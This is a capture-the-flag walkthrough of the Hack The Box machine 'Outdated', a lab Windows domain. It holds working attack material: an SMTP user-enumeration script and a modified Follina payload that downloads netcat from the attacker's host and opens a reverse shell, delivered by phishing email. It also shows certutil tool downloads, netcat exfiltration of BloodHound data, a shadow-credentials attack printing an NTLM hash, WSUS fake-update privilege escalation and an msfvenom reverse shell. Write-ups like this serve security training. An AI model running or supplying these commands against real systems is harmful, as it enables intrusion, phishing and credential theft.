Outdated#
DNS Enum#
We know about the domain name because the SMTP server discloses it
25/tcp open smtp hMailServer smtpd
| smtp-commands: mail.outdated.htb, SIZE 20480000, AUTH LOGIN, HELP
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
so we can probe the DNS server for more information
dig ANY @10.10.11.175 outdated.htb
dig ANY @10.10.11.175 outdated.htb +short
10.10.11.175
172.16.20.1
dc.outdated.htb.
dc.outdated.htb. hostmaster.outdated.htb. 228 900 600 86400 3600
dead:beef::108
dead:beef::6558:dffe:4c79:13ba
Domain Name: OUTDATED
Domain Sid: S-1-5-21-4089647348-67660539-4016542185
SMTP Enumeration Tangent#
The following wasn’t necessarilly a very fruitfull for the enumeration of this box
But it still was a good learning experience
On a previos machine, (trick) I had written a very simple python script to enumerate users from a postfix server.
And it worked by abusing the VRFY function.
This server here seems to be something called hMailServer smtpd if Nmap fingerprinting is correct.
As mentionned earyer the SMTP server, it discloses the domain name immediately on connectioni
telnet outdated.htb 25
Trying 10.10.11.175...
Connected to outdated.htb.
Escape character is '^]'.
220 mail.outdated.htb ESMTP
EHLO mail.outdated.htb
250-mail.outdated.htb
250-SIZE 20480000
250-AUTH LOGIN
250 HELP
Unfortunately though the VRFY command is disallowed,
So I won’t be able to reuse the script I wrote from trick
HELP
211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
VRFY asdf@asdf.org
502 VRFY disallowed.
Looking for other options in Hacktricks, I decide to give a try to the RCPT enumeration method
and it looks like its gonna work
MAIL FROM: asdf@asdf.org
250 OK
RCPT TO:asdf@outdated.htb
550 Unknown user
RCPT TO:itsupport@outdated.htb
250 OK
So at this stage I started writing silly python script to enumerate smtp users with RCPT.
I ended up with this:
import socket
import os
import sys
import argparse
from time import sleep
class Smpt():
def __init__(self, target, userlist, mailfrom, port=25):
self.target = target
self.userlist = userlist
self.port = port
self.mailfrom = [mailfrom, True]
self.sock = None
self.targetBanner = None
def readUsers(self):
with open(self.userlist, 'r') as file:
users = file.read().strip().split('\n')
self.userlist = users
return
def buildSock(self):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.target, self.port))
self.sock = s
banner = self.sock.recv(1024)[4::]
if self.targetBanner == None:
self.targetBanner = banner
return
def closeSock(self):
self.sock.close()
self.sock = None
return
def rcptProbe(self, mail):
if self.mailfrom[1]:
self.sock.send("EHLO all\r\n".encode())
self.sock.recv(1024)
self.sock.send(f"MAIL FROM:{self.mailfrom[0]}\r\n".encode())
self.sock.recv(1024)
self.mailfrom[1] = False
self.sock.send(f"RCPT TO:{mail}\r\n".encode())
response = self.sock.recv(1024).decode()
if "250" in response:
return True
else:
return False
if __name__ == "__main__":
smtp = Smpt(
target="10.10.11.175",
userlist=sys.argv[1],
mailfrom="asdf@asdf.org"
)
smtp.buildSock()
smtp.readUsers()
smtp.buildSock()
print(smtp.targetBanner.decode())
clear = "\033[K"
green = "\033[32m"
reset = "\033[m"
for name in smtp.userlist:
mail = name+"@outdated.htb"
print(f"{mail}{clear}\r", end="")
result = smtp.rcptProbe(mail)
if result:
print(f"\r{green}Found one:{reset} {mail}")
smtp.closeSock()
python3 smtp_rcpt_brute.py words
mail.outdated.htb ESMTP
Found one: itsupport@outdated.htb
I didn’t find anyting more on this box, but I figured, it could still potentially be usefull in the future
SMB enum#
back to actually trying to do something with the machine
nbtscan 10.10.11.168
smbmap -H 10.10.11.175
smbmap -H 10.10.11.175 -u null -p null
smbmap -H 10.10.11.175 -u guest
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
UpdateServicesPackages NO ACCESS A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent NO ACCESS A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.
We have access to “IPC$” and “Shares”, IPC$ is apparently empty
smbclient -U guest -N //10.10.11.175/Shares
smbclient --no-pass //10.10.11.175/Shares
but there a pdf in Shares
smb: \> ls
. D 0 Mon Jun 20 16:01:33 2022
.. D 0 Mon Jun 20 16:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 16:00:32 2022
9116415 blocks of size 4096. 1591614 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (159.3 KiloBytes/sec) (average 159.3 KiloBytes/sec)
From the pdf we get good indication that this is gonna be about sending a Follina payload to the support email
CVE-2022-30190 - Follina#
Lord John Hammond did a thing, and it’s really nice:
https://github.com/JohnHammond/msdt-follina
with the simplest args this generates a follina payload, and serves it over http on port 8000
if we use the –reverse flag, it slaps a reverse shell payload into the follina ms-msdt thing
and even opens a netcat listener for us to catch the shell
the code John wrote is actually fetching nc64.exe from his own github
and uses that to call back from the victim’s machine
Of course this isn’t gonna do the trick for us, since the victim doesn’t have internet access
So lets change the code slightly to host nc64.exe on our machine on another webserver on 9191
if args.reverse:
command = f"""Invoke-WebRequest http://10.10.14.43:9191/nc64.exe -OutFile C:\\Windows\\Tasks\\nc.exe; C:\\Windows\\Tasks\\nc.exe -e cmd.exe {serve_host} {args.reverse}"""
# Base64 encode our command so whitespace is respected
base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")
# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
"".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
+ "\n</script>"
)
generating the payload and starting the webserver and listener all at once
./follina.py -i tun0 -r 9090
[+] copied staging doc /tmp/y9v6zrd8
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
[+] starting 'nc -lvnp 9090'
listening on [any] 9090 ...
and starting the webserver on 9191 for netcat
python3 -m http.server 9191 2 ⨯
Serving HTTP on 0.0.0.0 port 9191 (http://0.0.0.0:9191/) ...
Double checking how the payload was generated
curl -s http://10.10.14.43:8000|awk -F '+' '{print $9}'|tr -d "'"|base64 -d
Invoke-WebRequest http://10.10.14.43:9191/nc64.exe -OutFile C:\Windows\Tasks\nc.exe; C:\Windows\Tasks\nc.exe -e cmd.exe 10.10.14.43 9090
now the only thing left to do is to deliver the payload
We’ll do that by sending a link to our local webserver hosting the follina payload over email to the itsupport team.
swaks \
--from asdf@asdf.htb \
--to itsupport@outdated.htb \
--header "Subject: asdfasdfasdfasdf" \
--server mail.outdated.htb \
--body 'http://10.10.14.43:8000'
couldn’t get a callback though, will try again some other day after trying a third day in a row, I finally got a callback, the only difference with today’s payload is, I hosted it myself instead of via the tool and it was servers on port 80 from an index.htlm text file. I’m pretty sure this didn’t have any incidence on it working or not. The machine is just utterly unstable.
BloodHound#
uploading sharphound on the box with certutil
certutil.exe -urlcache -f http://10.10.14.83:8000/SharpHound.exe SharpHound.exe
./SharpHound.exe -c All --zipfilename output.zip
exfiltrate the data
nc64.exe 10.10.14.83 4242 < output.zip
nc -lvnp 4242 > output.zip
Shadow Credential#
Uploading Rubeus and Whisker to the machine to perform the shadow credential attack I had to build whisker from source on a windows VM, and uploading the dotnet executable on the machine using certutil.exe. Yes I got a different ip in the meantime, this box is really unstable, so I change VPN servers often to get to a working one. Rubeus is already available as a binary in GhostPack
certutil.exe -urlcache -f http://10.10.14.15:8000/Whisker.exe Whisker.exe
certutil.exe -urlcache -f http://10.10.14.15:8000/Rubeus.exe Rubeus.exe
running whisker to add a new cred to sflowers
Whisker.exe add /target:sflowers
whisker then gives the exact syntax for rubeus to pull sflower’s TGT.
which looks like this:
Rubeus.exe asktgt /user:sflowers /certificate:<b64> /password:"hlyTBJYNHmGRbKJa" /domain:outdated.htb /dc:DC.outdated.htb /getcredentials /show
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.1.2
[*] Action: Ask TGT
[*] Using PKINIT with etype rc4_hmac and subject: CN=sflowers
[*] Building AS-REQ (w/ PKINIT preauth) for: 'outdated.htb\sflowers'
[*] Using domain controller: 172.16.20.1:88
[+] TGT request successful!
[*] base64(ticket.kirbi):
doIF0jCCBc6gAwIBBaEDAgEWooIE5zCCBONhggTfMIIE26ADAgEFoQ4bDE9VVERBVEVELkhUQqIhMB+g
*********************************SNIP*******************************************
NTVaqA4bDE9VVERBVEVELkhUQqkhMB+gAwIBAqEYMBYbBmtyYnRndBsMb3V0ZGF0ZWQuaHRi
ServiceName : krbtgt/outdated.htb
ServiceRealm : OUTDATED.HTB
UserName : sflowers
UserRealm : OUTDATED.HTB
StartTime : 10/8/2022 12:24:55 PM
EndTime : 10/8/2022 10:24:55 PM
RenewTill : 10/15/2022 12:24:55 PM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
KeyType : rc4_hmac
Base64(key) : ZFjdNOAHmXZtdFcrIm/m2w==
ASREP (key) : A187BB482CB402C93329AE80D660039C
[*] Getting credentials using U2U
CredentialInfo :
Version : 0
EncryptionType : rc4_hmac
CredentialData :
CredentialCount : 1
NTLM : 1FCDB1F6015DCB318CC77BB2BDA14DB5
Now we can use evil-winrm to PS remote in the machine as sflowers
Discovering a non TLS WSUS#
evil-winrm -i outdated.htb -u sflowers -H 1FCDB1F6015DCB318CC77BB2BDA14DB5
Using winpeas, we can see that there is a WSUS server that is running without TLS
cd $Env:temp
certutil.exe -urlcache -f http://10.10.14.15:8000/winpeas.bat winpeas.bat
[+] WSUS
[i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)
[?] https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#wsus
WUServer REG_SZ http://wsus.outdated.htb:8530
checking further on registry keys
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate
WUServer REG_SZ http://wsus.outdated.htb:8530
the wsus server is indeed http and not https
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU
UseWUServer REG_DWORD 0x1
and the UseWUServer is 1, so it’s turned on
Exploiting WSUS#
We’ll be using SharpWSUS
SharpWSUS
PayloadAllTheThings
Once again I downloaded that on a windows VM with Visual Studio, and attempted to compile it into a dotnet binary. But this approach didn’t work for me cause this is a .NET Framework 4.0 project, and I can’t get that for the version and CPU architecture that I’m running Visual Studio on…
So I’m extracting that from the
S3cur3Th1sSh1t repo.
wget https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpWSUS.ps1
# Deleted everything but the base64 payload from the file then:
cat Invoke-SharpWSUS.ps1 |base64 -d > SharpWSUS.gz
gunzip SharpWSUS.gz
file SharpWSUS
SharpWSUS: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
mv SharpWSUS{,.exe}
upload sharpWSUS on the machine
certutil.exe -urlcache -f http://10.10.14.15:8000/SharpWSUS.exe SharpWSUS.exe
make an update that will add sflowers to the administrators group
./SharpWSUS.exe create /payload:"C:\Users\sflowers\Desktop\PsExec64.exe" /args:"-accepteula -s -d cmd.exe /c \"net localgroup administrators sflowers /add\""
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Create Update
[*] Creating patch to use the following:
[*] Payload: PsExec64.exe
[*] Payload Path: C:\Users\sflowers\Desktop\PsExec64.exe
[*] Arguments: -accepteula -s -d cmd.exe /c \net
[*] Arguments (HTML Encoded): -accepteula -s -d cmd.exe /c \net
################# WSUS Server Enumeration via SQL ##################
ServerName, WSUSPortNumber, WSUSContentLocation
-----------------------------------------------
DC, 8530, c:\WSUS\WsusContent
ImportUpdate
Update Revision ID: 30
PrepareXMLtoClient
InjectURL2Download
DeploymentRevision
PrepareBundle
PrepareBundle Revision ID: 31
PrepareXMLBundletoClient
DeploymentRevision
[*] Update created - When ready to deploy use the following command:
[*] SharpWSUS.exe approve /updateid:0141ab3f-05f0-4d91-b8d4-a7d7f4eba208 /computername:Target.FQDN /groupname:"Group Name"
[*] To check on the update status use the following command:
[*] SharpWSUS.exe check /updateid:0141ab3f-05f0-4d91-b8d4-a7d7f4eba208 /computername:Target.FQDN
[*] To delete the update use the following command:
[*] SharpWSUS.exe delete /updateid:0141ab3f-05f0-4d91-b8d4-a7d7f4eba208 /computername:Target.FQDN /groupname:"Group Name"
[*] Create complete
Approve the update
./SharpWSUS.exe approve /updateid:0141ab3f-05f0-4d91-b8d4-a7d7f4eba208 /computername:dc.outdated.htb /groupname:"blnkn-admin"
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Approve Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
Group Exists = False
Group Created: blnkn-admin
Added Computer To Group
Approved Update
[*] Approve complete
Check if the update has been installed
./SharpWSUS.exe check /updateid:0141ab3f-05f0-4d91-b8d4-a7d7f4eba208 /computername:dc.outdated.htb
____ _ __ ______ _ _ ____
/ ___|| |__ __ _ _ __ _ _\ \ / / ___|| | | / ___|
\___ \| '_ \ / _` | '__| '_ \ \ /\ / /\___ \| | | \___ \
___) | | | | (_| | | | |_) \ V V / ___) | |_| |___) |
|____/|_| |_|\__,_|_| | .__/ \_/\_/ |____/ \___/|____/
|_|
Phil Keeble @ Nettitude Red Team
[*] Action: Check Update
Targeting dc.outdated.htb
TargetComputer, ComputerID, TargetID
------------------------------------
dc.outdated.htb, bd6d57d0-5e6f-4e74-a789-35c8955299e1, 1
[*] Update is not installed
[*] Check complete
and wait a little until it is, after that, sflowers will be a member of the Administrator group
net user sflowers
User name sflowers
Full Name Susan Flowers
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/20/2022 11:04:09 AM
Password expires Never
Password changeable 6/21/2022 11:04:09 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 6/15/2022 10:48:27 PM
Logon hours allowed All
Local Group Memberships *Administrators *Remote Management Use
*WSUS Administrators
Global Group memberships *Domain Users
The command completed successfully.
you can now log off and log back in and the privilege will be effective, which means that we can navigate to the Admin directory and get the flag
a few more windows command
Get-PSSession -ComputerName localhost
net users sflowers
del payload.exe
cd %temp% # in CMD
cd $Env:temp # in powershell
where certutil.exe # CMD only?
use msfvenom to do a reverse shell in cmd instead of Evil-WinRM’s powershell
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.15 LPORT=4444 -f exe > payload.exe
rlwrap nc -lvnp 4444